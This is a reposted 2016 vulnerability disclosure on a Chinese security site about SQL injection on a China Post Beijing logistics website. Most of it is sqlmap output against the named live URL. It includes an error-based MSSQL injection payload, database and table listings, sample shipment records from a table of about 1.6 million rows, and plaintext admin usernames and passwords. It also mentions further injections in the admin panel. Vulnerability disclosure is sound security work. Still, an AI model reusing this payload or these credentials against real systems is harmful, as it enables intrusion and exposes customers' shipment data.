神刀安全网

漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞详情

披露状态:

2016-04-09: 细节已通知厂商并且等待厂商处理中
2016-04-09: 厂商已经确认,细节仅向厂商公开
2016-04-19: 细节向核心白帽子及相关领域专家公开
2016-04-29: 细节向普通白帽子公开
2016-05-09: 细节向实习白帽子公开
2016-05-24: 细节向公众公开

简要描述:

多个地方SQL注入

详细说明:

code 区域
http://www.bj-cnpl.com

中 国 邮 政 速 递 物 流 股 份 有 限 公 司 北 京 市 分 公 司

系统多处存在SQL注入,泄露一些运单信息

code 区域
http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1

漏洞标题:  中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

orderno存在SQL注入

code 区域
current user:    'cnpluser'

code 区域
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: http://www.bj-cnpl.com:80/showstate.asp?orderno=-3966') OR 7043=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (7043=7043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(113))) AND ('Quqa'='Quqa&x=38&y=1
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] AT
[*] ATRACK
[*] master
[*] model
[*] msdb
[*] tempdb

code 区域
Database: ATRACK
[19 tables]
+---------------------+
| CNPL_DNJ_REDOC |
| Logistic_DNJ |
| Logistic_POD_Status |
| Logistic_Russia |
| Logistic_Shipment |
| Logistic_State |
| Logistic_Upload_D |
| Logistic_Upload_I |
| Logistic_Upload_M |
| Logistic_User |
| MAN_DT |
| MAN_HD |
| atrackdssw21 |
| atrackdssw22 |
| atrackdssw23 |
| atrackdssw24 |
| atrackdssw25 |
| sysdiagrams |
| 中邮与俄方状态对照表|
+---------------------+

code 区域
Database: ATRACK
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.Logistic_State | 1641873 |转运信息
| dbo.CNPL_DNJ_REDOC | 348257 |
| dbo.Logistic_Upload_I | 1259 |
| dbo.Logistic_Upload_M | 1237 |
| dbo.Logistic_Shipment | 941 |
| dbo.Logistic_POD_Status | 47 |
| dbo.Logistic_Russia | 23 |
| dbo.MAN_DT | 17 |
| dbo.Logistic_User | 11 |
| dbo.Logistic_Upload_D | 6 |
| dbo.MAN_HD | 6 |
| dbo.Logistic_DNJ | 1 |
+-------------------------+---------+

code 区域
Table: Logistic_State
[3 entries]
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| Logistic_State_ID | Logistic_State_No | Logistic_State_DT | Logistic_State_Eng | Logistic_State_Chn | Logistic_State_OPS | Logistic_State_Memo | Logistic_State_City | Logistic_State_Time | Logistic_State_Sign | Logistic_State_Code_Problem | Logistic_State_Code_PINumber |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+
| 10000 | BPIL870050205 | 11 20 2012 1:18PM | Arrived on an airport warehouse | 到达机场监管中心 | admin | Arrived on an airport warehouse | Moscow, Russia | 11 10 2012 3:00PM | <blank> | <blank> | STA 56 |
| 100000 | CT287578855CN | 02 27 2014 9:06AM | Shipment Out of Delivery | 快件外出派送 | admin | <blank> | CANADA | 02 26 2014 12:19PM | <blank> | <blank> | SH003 |
| 1000000 | 98723A925 | 09 22 2015 8:25AM | Shipment forwarded | 快件转运 | admin | <blank> | 东莞 | 09 22 2015 6:57AM | <blank> | <blank> | SH272 |
+-------------------+-------------------+--------------------+---------------------------------+--------------------+--------------------+---------------------------------+---------------------+---------------------+---------------------+-----------------------------+------------------------------+

漏洞证明:

用户密码什么的没有加密

code 区域
+------------------+--------------------+---------------------+-----------------------+------------------------+
| Logistic_User_ID | Logistic_User_Name | Logistic_User_Power | Logistic_User_Enabled | Logistic_User_Password |
+------------------+--------------------+---------------------+-----------------------+------------------------+
| 1 | admin | ADMIN | YES | lzyouzheng |
| 10 | emskf | ADMIN | YES | kefuzhongxin |
| 11 | guoji | ADMIN | YES | guojifengongsi |
+------------------+--------------------+---------------------+-----------------------+------------------------+

登陆后台,发现后台又有SQL注入

新添加状态,填入“'”

漏洞标题:  中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞标题:  中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞标题:  中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

另外两处

漏洞标题:  中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

漏洞标题:  中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中国邮政北京分公司某站点多处SQl注入(一百多万的转运信息)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址